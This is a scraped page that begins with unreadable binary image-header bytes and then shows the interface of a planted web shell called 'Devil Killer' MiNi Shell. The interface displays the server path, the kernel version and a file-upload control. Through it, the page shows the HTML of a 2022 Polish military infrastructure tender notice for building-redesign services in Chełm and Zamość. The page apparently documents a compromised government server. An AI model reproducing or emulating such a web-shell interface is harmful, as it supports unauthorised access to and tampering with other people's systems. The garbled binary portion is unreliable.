JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20220310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20220310/0008138301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Oprac. Progr.Inwest.dla zadań pn.: „Przebudowa bud. nr 9” w kw w m. Chełm oraz „Przebudowa wraz ze zmianą sposobu użytkowania b. nr 48 (łaźnia) na magazyn wielobranżowy” w kw w m. Zamość (2 części) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Rejonowy Zarząd Infrastruktury w Lublinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 430268824</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Lipowa 1A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lublin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rzilublin.zampub@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://rzilublin.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Jednostka organizacyjna MON </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Oprac. Progr.Inwest.dla zadań pn.: „Przebudowa bud. nr 9” w kw w m. Chełm oraz „Przebudowa wraz ze zmianą sposobu użytkowania b. nr 48 (łaźnia) na magazyn wielobranżowy” w kw w m. Zamość (2 części) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b5a31742-a043-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00081383</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00009595/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Opracowanie Programów Inwestycji dla zadań &#34;Przebudowa budynku nr 9&#34; w K.W. w m. Chełm oraz &#34;Przebudowa wraz ze zmianą sposobu użytkowania budynku nr 48 na magazyn wielobranżowy&#34; w K.W. w m. Zamość</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://rzilublin.wp.mil.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">komunikacja między Zamawiającym a Wykonawcami odbywa się:<br/>1. za pomocą poczty elektronicznej: rzilublin.zampub@ron.mil.pl - w zakresie przekazywania pytań, podmiotowych środków dowodowych, innych oświadczeń i dokumentów; 2. za pomocą miniPortalu ePuap - w zakresie złożenia oferty wraz z załącznikami - https://miniportal.uzp.gov.pl, https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich uzyciu opisane zostały w Regulaminie korzystania z usługi miniPortalu (https://miniportal.uzp.gov.pl/WarunkiUslugi) oraz Warunkach korzystania z elektronicznej platformy<br/>usług administracji publicznej (ePuap) (https://www.gov.pl/web/gov/warunki-korzystania).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">4.004/22/TP1/WIB</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1: Opracowanie Programu Inwestycji dla zadania pn.: „Przebudowa budynku nr 9” w kompleksie wojskowym w m. Chełm. SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA dotyczący części nr 1 określają:<br/>Szczegółowy Opis Przedmiotu Zamówienia/Umowy (SOPZ/U) stanowi załącznik nr 1 do SWZ; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze ofertę najkorzystniejszą na podstawie poniższych kryteriów oceny ofert:<br/><br/>Cena oferty - waga 60 %<br/>Termin wykonania - waga 40%<br/>2. Oferty będą oceniane w systemie punktowym. Za najkorzystniejszą uznana zostanie oferta, która uzyska największą liczbę punktów wyliczonych wg wzoru:<br/><br/>P = Pc + Pt<br/>gdzie:<br/>P – suma punktów przyznana ofercie,<br/>Pc – liczba punktów przyznana ofercie w kryterium – cena<br/>Pt – liczba punktów przyznana ofercie w kryterium – termin realizacji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2: Opracowanie Programu Inwestycji dla zadania pn. Przebudowa wraz ze zmianą sposobu użytkowania budynku nr 48 (łaźnia) na magazyn wielobranżowy w kompleksie wojskowym w m. Zamość. SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA dotyczący części nr 2 określają:<br/>Szczegółowy Opis Przedmiotu Zamówienia/Umowy (SOPZ/U) stanowi załącznik nr 1a do SWZ; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">amawiający wybierze ofertę najkorzystniejszą na podstawie poniższych kryteriów oceny ofert:<br/><br/>Cena oferty - waga 60 %<br/>Termin wykonania - waga 40%<br/>2. Oferty będą oceniane w systemie punktowym. Za najkorzystniejszą uznana zostanie oferta, która uzyska największą liczbę punktów wyliczonych wg wzoru:<br/><br/>P = Pc + Pt<br/>gdzie:<br/>P – suma punktów przyznana ofercie,<br/>Pc – liczba punktów przyznana ofercie w kryterium – cena<br/>Pt – liczba punktów przyznana ofercie w kryterium – termin realizacji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) Zdolności do występowania w obrocie gospodarczym:<br/><br/> Warunek ten zostanie spełniony, jeżeli:<br/>Wykonawca wykaże, ze posiada wpis do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania. <br/><br/> 2) uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów:<br/><br/>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.<br/><br/> 3) Sytuacji ekonomicznej lub finansowej:<br/><br/>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.<br/><br/> 4) Zdolności technicznej lub zawodowej:<br/><br/>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że:<br/><br/> 4.1. nie wcześniej niż w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w  tym okresie wykonał: <br/> a) co najmniej (1) jedną usługę polegającą na opracowaniu Programu Inwestycji na budowę budynku magazynowego lub przebudowę budynku na budynek o przeznaczeniu magazynowym o kubaturze minimum 5 000 m3<br/>lub<br/> b) co najmniej (1) jedną usługę polegającą na opracowaniu dokumentacji projektowo-kosztorysowej na budowę budynku magazynowego lub przebudowę budynku na budynek o przeznaczeniu magazynowym o kubaturze minimum 5 000 m3<br/><br/> 4.2. skieruje do realizacji zamówienia publicznego:<br/><br/> a) co najmniej jedną (1) osobę posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie projektowania w każdej ze specjalności<br/> a. architektonicznej - uprawnienia bez ograniczeń,<br/> b. konstrukcyjno – budowlanej - uprawnienia bez ograniczeń,<br/> c. instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych - uprawnienia bez ograniczeń,<br/> d. instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - uprawnienia bez ograniczeń,<br/> e. instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych –uprawnienia bez ograniczeń,<br/> f. inżynieryjnej – drogowej – Zamawiający nie wymaga uprawnień bez ograniczeń.<br/>Wymagana jest przynależność projektantów do właściwej izby samorządu zawodowego (zgodnie z art. 14 ust. 1 ustawy z dnia 07.07.1994 r. Prawo budowlane <br/>oraz Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie).<br/> b) co najmniej jedną (1) osobę posiadającą świadectwo nadania uprawnień zawodowych w dziedzinie geodezji i kartografii w zakresie geodezyjnych pomiarów sytuacyjno-wysokościowych, realizacyjnych i inwentaryzacyjnych, zgodnie z art. 43, pkt 1 ustawy Prawo geodezyjne i kartograficzne.<br/>Osoba ta musi posiadać poświadczenie bezpieczeństwa lub pisemne upoważnienie uprawniające do dostępu do informacji niejawnych o klauzuli „Zastrzeżone”, wydane przez kierownika jednostki organizacyjnej oraz aktualne zaświadczenie o odbyciu szkolenia w zakresie ochrony informacji niejawnych.<br/><br/><br/>Ocena spełniania w/w warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą „spełnia – nie spełnia” w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w punkcie XVIII SWZ.<br/><br/>Zasady spełniania warunków udziału w postępowaniu w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia opisane są w pkt XXIV SWZ.<br/><br/>Postanowienia w zakresie polegania na zdolnościach podmiotów udostępniających zasoby opisane są w pkt XX SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. OŚWIADCZENIE Wykonawcy o aktualności informacji zawartych <br/>w Oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp w zakresie podstaw wykluczenia z postępowania, wskazanych przez Zamawiającego - według wzoru załączonego do SWZ. <br/><br/> 2. W przypadku Wykonawcy wobec którego wydano prawomocny wyrok sądu lub ostateczną decyzję administracyjną o zaleganiu z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne Wykonawca złoży: <br/><br/> • dowód potwierdzający, że Wykonawca przed upływem terminu do składania ofert dokonał płatności należnych podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłaty tych należności;<br/><br/> 3. W przypadku, gdy należąc do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, Wykonawcy złożyli odrębne oferty Wykonawca złoży:<br/> • dowód potwierdzający, że Wykonawcy przygotowali te oferty niezależnie od siebie;<br/><br/> 4. Gdy w przypadkach, o których mowa w art. 85 ust. 1, doszło do zakłócenia konkurencji, wynikającego z wcześniejszego zaangażowania tego Wykonawcy lub podmiotu, który należy z Wykonawcą do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, Wykonawca złoży: <br/> • dowód potwierdzający, że spowodowane tym zakłócenie konkurencji może być wyeliminowane w inny sposób niż przez wykluczenie Wykonawcy <br/>z udziału w postępowaniu o udzielenie zamówienia.<br/><br/> 5. W przypadku Wykonawcy który naruszył obowiązki dotyczące płatności podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne<br/>z wyjątkiem przypadku, o którym mowa w art. 108 ust. 1 pkt 3, <br/> • dowód, potwierdzający, iż Wykonawca przed upływem terminu do składania ofert dokonał płatności należnych podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłaty tych należności;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">zdolności do występowania w obrocie gospodarczym:<br/>1. Dokument potwierdzający, że Wykonawca jest wpisany do jednego z <br/>rejestrów zawodowych lub handlowych, prowadzonych w kraju, w <br/>którym ma siedzibę lub miejsce zamieszkania, wystawiony nie wcześniej <br/>niż 6 miesięcy od dnia złożenia;<br/>II. uprawnień do prowadzenia określonej działalności gospodarczej lub <br/>zawodowej, o ile nie wynika to z odrębnych przepisów:<br/>Zamawiający nie żąda dokumentów w w/w zakresie.<br/>III. sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie żąda dokumentów w w/w zakresie.<br/>IV. zdolności technicznej lub zawodowej:<br/>1. WYKAZ USŁUG wykonanych, a w przypadku świadczeń powtarzających się lub <br/>ciągłych <br/>również wykonywanych, w okresie ostatnich 3 lat licząc od dnia, w którym <br/>upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy <br/>- w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i <br/>podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane - według <br/>wzoru załączonego do SWZ;<br/>Obowiązek wskazania przez Wykonawcę w Wykazie usług dotyczy usług, o których <br/>mowa w pkt XVII pkt 2. ppkt 4). 4.1 SWZ.<br/>Każda przedstawiona w w/w wykazie usługa musi odpowiadać swoim rodzajem <br/>przedmiotowi zamówienia, zgodnie z wymaganiami warunku udziału w <br/>postępowaniu w zakresie posiadania przez Wykonawcę zdolności technicznej lub <br/>zawodowej do wykonania zamówienia, o którym mowa w XVII pkt 2. ppkt 4). 4.1 <br/>SWZ.<br/>Zgodnie z § 9 ust. 3 Rozporządzenia Ministra Rozwoju, Pracy i Technologii w <br/>sprawie podmiotowych środków dowodowych oraz innych dokumentów lub <br/>oświadczeń, jakich może żądać zamawiający od wykonawcy, jeżeli Wykonawca <br/>powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z <br/>innymi Wykonawcami, Wykaz usług, o którym mowa w pkt XVII pkt 2. ppkt 4). <br/>4.1SWZ dotyczy usług, w których wykonaniu Wykonawca ten bezpośrednio <br/>uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w <br/>których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.<br/>2. DOWODY określające, czy te usługi zostały wykonane lub są wykonywane <br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne <br/>dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, <br/>a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli <br/>Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych <br/>dokumentów – oświadczenie Wykonawcy. W przypadku świadczeń <br/>powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne <br/>dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w <br/>okresie ostatnich 3 miesięcy.<br/>3. WYKAZ OSÓB skierowanych przez Wykonawcę do realizacji zamówienia <br/>publicznego, w szczególności odpowiedzialnych za świadczenie usług wraz z <br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i <br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także <br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do <br/>dysponowania tymi osobami - według wzoru załączonego do SWZ;<br/>Wykaz osób powinien obejmować wszystkie osoby opisane w pkt XVII pkt 2 ppkt</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. OŚWIADCZENIE, o którym mowa w art. 125 ust. 1 ustawy Pzp, wstępnie potwierdzające brak podstaw wykluczenia oraz spełnienie warunków udziału <br/>w postępowaniu w zakresie wskazanym przez Zamawiającego na dzień składania ofert - według wzoru załączonego do SWZ – jako załącznik do oferty.<br/><br/>Wykonawca, winien zamieścić w w/w Oświadczeniu informacje o:<br/> • powoływaniu się na zasoby podmiotów udostępniających zasoby, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz 